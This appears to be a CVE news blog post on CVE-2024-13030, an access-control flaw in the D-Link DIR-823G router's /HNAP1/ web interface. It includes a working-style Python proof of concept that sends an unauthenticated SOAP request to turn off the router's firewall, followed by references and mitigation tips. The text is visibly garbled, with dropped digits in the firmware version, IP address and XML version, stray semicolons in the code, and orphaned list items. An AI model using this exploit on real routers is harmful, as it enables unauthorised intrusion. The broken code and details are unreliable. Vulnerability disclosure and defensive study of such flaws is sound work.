CVE CyberSecurity Database News

CVE-2024-13030 - Critical Remote Exploit in D-Link DIR-823G Web Management Interface

Poster -

---

Introduction

In early 2024, researchers identified a critical vulnerability in the D-Link DIR-823G wireless router (firmware version 1..2B05_20181207). Registered as CVE-2024-13030, this flaw impacts multiple web management functions exposed through the /HNAP1/ endpoint. The vulnerability allows remote attackers to bypass access controls and change vital router settings without authorization.

This post breaks down how the vulnerability works, shares code snippets demonstrating the issue, links to original references, and describes possible exploitation scenarios. All information is provided in clear, straightforward language and is exclusive for this article.

Firmware: 1..2B05_20181207 (possibly others)

- Component: Web Management Interface (/HNAP1/)

SetVirtualServerSettings

- CVE: CVE-2024-13030

The Vulnerability: Weak Access Controls

These functions are supposed to enforce authentication and only let authorized users make changes. But in the vulnerable firmware, weak access controls let any attacker on the network (and potentially from the internet if remote management is enabled) send specially crafted HTTP messages to modify crucial router settings.

How the Attack Works

Attackers can craft simple HTTP POST requests to the /HNAP1/ endpoint with properly formatted XML data, without needing to log in. The router processes these requests and carries out changes, allowing:

Sample Exploit Code

Below is a Python snippet using the requests library to exploit the SetFirewallSettings action. This script disables the firewall without authentication.

> WARNING: Running this code against systems you do not own is illegal.

import requests

# Set router IP address
router_ip = "http://192.168..1";

# Target endpoint
url = router_ip + "/HNAP1/"

# Custom headers (no authentication)
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "\"http://purenetworks.com/HNAP1/SetFirewallSettings\"";
}

# XML data to turn firewall off
xml_data = '''<?xml version="1." encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">;
<SOAP-ENV:Body>
<SetFirewallSettings xmlns="http://purenetworks.com/HNAP1/">;
    <SPIEnabled>false</SPIEnabled>
    <IPv6FirewallEnabled>false</IPv6FirewallEnabled>
    <AntiSpoofChecking>false</AntiSpoofChecking>
</SetFirewallSettings>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
'''

# Send HTTP request without credentials
response = requests.post(url, headers=headers, data=xml_data, timeout=10)

if response.status_code == 200:
    print("Exploit sent. Router response:")
    print(response.text)
else:
    print(f"Exploit failed. Status code: {response.status_code}")

References

- Official CVE record: CVE-2024-13030
- D-Link DIR-823G Product Page

Public Exploit Disclosure:

- Exploit Database #52471
- Packet Storm Security
- Technical Advisory: GitHub PoC

Change parental or client restrictions

If remote management is enabled, the risk increases massively as attacks can be carried out online from anywhere.

Disable Remote Management: Turn off remote management on your router’s web interface.

3. Firewall External Access: Use a device-level firewall to block all WAN-side access to the router except what you need.

Conclusion

CVE-2024-13030 is a major security flaw for D-Link DIR-823G routers running old firmware. By sending crafted HTTP POST requests, anyone can change your router’s most important network settings. If you use this router, update your firmware or take steps to secure your network immediately.

Stay safe, and always keep your devices up-to-date!


*If you found this post useful, share it to help others protect their networks. For more details, always refer to the official CVE and vendor advisories.*

Timeline

Published on: 12/30/2024 01:15:06 UTC